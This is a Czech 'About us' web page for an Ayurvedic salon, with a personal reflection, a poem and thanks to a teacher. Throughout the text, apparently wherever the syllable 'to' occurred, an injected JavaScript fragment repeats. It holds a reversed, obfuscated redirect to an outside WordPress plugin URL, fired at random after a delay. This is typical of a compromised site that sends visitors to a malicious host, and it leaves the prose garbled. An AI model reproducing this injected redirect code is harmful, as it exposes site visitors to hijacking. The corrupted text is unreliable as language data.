O nás

Ájurvédský salon Šafrán je jedna z mnoha větviček, která patří do rozrůstajícího se stromu ájurvédy.

Ve svém životě jsem měla toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to obrovské štěstí potkat velké osobnosti, jejichž moudrost nepotřebovala žádnou profesi. To čím je jejich síla a klid je – brahmavidjá, vnitřní poznání.

Pak, až jej naleznem
květ ten rozvitý,
pak není třeba
již nikdy jít spát.
Pak nastane den
plný jasného Bdění
ve kterém se nebudem
nikdy již bát.
Budem se dívat jen
do světa dění,
budem se dívat jen
jak tělo jde spát.

Vaše přítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomnost na toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to světě by měla být jako přítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomnost slunce.

Ať se objevíte kdekoliv, mělo by s Vámi přicházet světlo, moudrost a láska, pochopení, čistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tota a umění odpustit. Odpuštění je jedinou z největších věcí, kterou můžeme učinit.

Jedno z velkých setkání se uskutečnilo s Dr. Govindem Sahai Rajpootem Ph.D., se kterým vznikla vzájemná spolupráce od roku 1995. Vážím si toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tohotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to člověka především za toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, že má v sobě neuvěřitelně sinou a stálou oddanost k ájurvédě, kterou rozsévá již dvacet let v ČR. Byla jsem svědkem mnoha případů a obdivuji, jak ájurvéda dokáže rozeznat, uchopit a vysvětlit vznikající nemoc či nerovnováhu v lidském těle. Život je krásný a může být ještě půvabnější, když známe, jak funguje naše tělo a mysl v toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to čase a prostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toru. Není jiného přání, než držet se za ruku s ájurvédou a žít s plným vědomím a poznáním sebe sama.

Děkuji za tytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to vědomosti, za dlouholeté přednášky a také za tvrdou výchovu, která den co den obrušovala hrany tvrdohlavé mysli, za trpělivost v učení a velké umění v provádění těchtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to činností.